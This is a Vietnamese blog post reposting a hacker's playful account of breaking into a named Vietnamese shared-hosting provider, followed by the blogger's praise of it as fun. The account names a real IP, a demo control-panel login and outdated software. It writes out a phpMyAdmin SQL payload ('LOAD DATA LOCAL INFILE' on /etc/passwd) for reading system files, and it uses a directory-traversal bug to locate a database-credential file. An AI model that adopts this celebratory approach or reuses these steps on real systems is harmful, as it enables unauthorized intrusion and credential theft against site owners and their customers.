chuyện vui, một website bên ngoài lượm thượm kiểu này thì bên trong chắc cũng có cỡ vài ba cái fireware...giấy, thằng mrro cười. Lên Netcraft xem thử cái server tí nào, "www.netcraft.com/whats". Òh một máy chủ chạy RedHat Linux 7.2 với Apache 1.3.23/mod_php4. Hihi, software cũng không được *up2date* cho lắm nhỉ, ừh cũng phải KISS (Keep It Simple, Stupid!), mấy lão admin thường tuân thủ theo cái rule này. Thôi kệ, để đó tính sau, dân *amatuer* như thằng mrro không có thói quen hack bằng các lỗi software hệ thống, nó thích hack bằng lỗi của mấy thằng admin và programmer *chuyên nghiệp* hơn. Thao tác vài ba cái URL, nó nhanh chóng nhận ra website này dùng Oracle làm backend database. PHP và Oracle, một sự kết hợp thú vị nhỉ. Chưa có nhiều kinh nghiệm hack các Oracle database server nhưng thằng mrro ghi vào file sggp.org.vn.txt thông tin này để khi cần thiết thì dùng đến(hihi, mỗi một lần làm chuyện gì thằng mrro điều ghi lại vào một file, và cái file mà nó gặp lại hôm nay chính là file sggp.org.vn.txt này). nmap chứ? Khoan vội đã. Ghé thăm bạn Google tí đã. Thằng mrro gõ vào keyword “VDC Hosting”, website này thuê host ở VDC mà, thử vận may xem. Òh, hiện ra ngay vị trí thứ nhất: TeleHosting . Thử ghé vô chơi xem có gì thú vị không. Òh, một website trông cũng được, trình bày gọn gàng. Làm một số thao tác, thằng mrro đổi tên file sggp.org.vn.txt lại thành hosting.vnn.vn.txt và ghi thêm vào một số thông tin(tất cả thông tin này điều có thể được tìm thấy ngay Index và trên Netcraft): -Telehosting: - IP address: 203.162.96.70 (cùng IP với sggp.org.vn => shared hosting) -Apache/2.0.47 (Unix) PHP/4.3.0 JRun/4.0 mod_jk/1.2.3-dev on Linux -Control Panel: -Demo account: cpvdc2/demo Hihi, chuyên nghiệp nhỉ, cho cả demo account để thử àh. Thằng mrro thử truy cập vào Control Panel bằng cái account đó. Thằng Control Panel cung cấp một số công cụ quản lí như Cập nhật thông tin, Gửi thư yêu cầu, FTP, FileManager, MySQL,Webmail…Hơi bị nhiều nhỉ. Hìhì, coi bộ ngon ăn àh. Thằng mrro hí hửng nhảy vào thử cái FTP, *Permission denied*. Tới lượt thằng FileManager cũng vậy. Nhưng rồi vị cứu tinh cũng đến, thằng MySQL cho phép truy cập, hihi, nó dẫn thằng mrro đến phpMyAdmin bộ công cụ quản lí MySQL. Coi như xong nửa chặng đường rồi, thằng mrro cười ha hả . Thằng mrro tự tin như vậy là cũng có lý do, với MySQL và phpMyAdmin, nó có thể làm được khối chuyện với cái server này. Bởi đơn giản nó đã có thể chạy được các câu lệnh query trên máy chủ này rồi. Vả lại, phpMyAdmin version cũ như thế này (2.3.2) thì chắc chắn sẽ có lỗi, ai biết được nhiều khi may mắn sẽ có cả lỗi cho phép nó chạy lệnh trên server này. Giờ search lỗi phpMyAdmin trước hay hack thằng MySQL trước đây? Sao không làm song song nhỉ, hihi, chắc sẽ có lợi hơn. Nghĩ là làm, thằng mrro mở hai cửa sổ browser lên (FYI, it’s Firefox), một cái nó nhảy vào Bugtraq search với từ khóa phpMyAdmin, một cái nó login vào phpMyAdmin với account demo. Vào trong phpMyAdmin rồi, nhanh như đã được lập trình sẵn, thằng mrro gõ câu lệnh query: CREATE TABLE test(id INT,text LONGTEXT); LOAD DATA LOCAL INFILE ‘/etc/passwd’ INTO TABLE test FIELDS ESCAPE BY ‘’ ; SELECT * FROM test; và enter, một màn hình hiện đầy đủ các username có trong hệ thống hiện ra ngay trước mặt nó, yahoo! Hihi, với phpMyAdmin này thì thằng mrro sẽ có thể đọc được nhiều file trong hệ thống lắm àh. Cẩn thận lưu lại các thông tin này, “giờ mục tiêu là gì?”, thằng mrro tự hỏi. Phải upload được file lên hoặc phải lấy được username và passwd của một user trong hệ thống. Nó bắt đầu phân tích. Với một cái máy chủ shared hosting như thế này, chắc chắn sẽ có trường hợp username và passwd trùng nhau. Đó là một hướng. Hướng thứ hai là truy cập vào database chứa dữ liệu về khách hàng. Khi đã truy cập vào database này được rồi thì mọi chuyện sẽ trở nên rất dễ dàng, chắc chắn trong đó sẽ có đầy đủ username và passwd mà thằng mrro cần tìm. Các tay admin *chuyên nghiệp* này thế nào cũng sẽ viết một công cụ quản lí khách hàng cho riêng mình, giờ chỉ cần biết được MySQL username và passwd để truy cập vào database đó là xong. Mà thường thì username và passwd này sẽ được lưu trong một file config.php nào đó, các tay viết PHP vẫn thường làm vậy. Hihi, vấn đề duy nhất còn lại là làm sao biết đường dẫn của file đó. Thằng mrro quyết định đi theo hướng thứ hai trước đơn giản vì hướng đi này coi bộ hấp dẫn hơn, mặc dù đi theo hướng thứ nhất thì có vẻ sẽ dễ dàng hơn. Giờ làm gì tiếp theo? Àh khoan, phải xem xem có tìm được gì bên Bugtraq hông đã. Àh cũng có một vài lỗi, coi bộ không nặng lắm, hình như toàn XSS không. Vừa định tắt cửa sổ Bugtraq đi (gì chứ thằng mrro cũng không thích ba cái vụ này lắm) thì một cái lỗi đập vào mắt thằng mrro. phpMyAdmin XSS Vulnerabilities, Transversal Directory Attack , Information Encoding Weakness and Path Disclosures ( http://www.securityfocus.com/archive/1/325641 ). Path Disclosures và Transversal Directory Attack, hehe, vụ này hay àh. Lưu lại đường link xong, thằng mrro click vào để xem chi tiết cái lỗi. Rồi xong, hết phim! Cái lỗi Transversal Directory attack cho phép đọc nội dung (bao gồm file và subfolder) của một folder bất kì trong hệ thống (chính xác là folder nào cho phép user apache đọc). Nhanh chóng lợi dụng lỗi này, cùng với cái Path Disclosures, thằng mrro gõ http://hosting.vnn.vn/Admin/db_details_imp...ath=/opt/daiweb Hehe chình ình một đống trước mặt một cái file mang tên connect.php đúng như thằng mrro dự đoán. Lại dùng chiêu LOAD DATA INFILE, và hết! --mrro. Đọc xong bài viết này bạn có cảm giác gì ?? Vui không ? Tôi thấy rất vui, nó làm cho tôi vốn đã thấy hacking rất vui nay lại càng vui hơn. Hacker ( hay những người biết hack) thật sự ở VN không mấy ai khi hack xong mà viết tut lại vui vẻ thế này đâu. Trước đây Huyremy có lần viết lại quá trình hack HVA nhưng không vui cho lắm, vả lại Huy cũng viết có mỗi 1 cái đó thôi ....Khi nào tìm được bài viết nào vui thế này tôi sẽ lại giới thiệu với các bạn ! Chúc vui vẻ ! The End
Hack Sever Reviewed by Admin Star Khoa IT on 07:00:00 Rating: 5

Không có nhận xét nào:

All Rights Reserved by Đăng Khoa Blog © 2016 - 2017
Thiết Kế Bởi Đăng Khoa

Biểu mẫu liên hệ

Tên

Email *

Thông báo *

Được tạo bởi Blogger.
Xuống cuối trang
Chat
1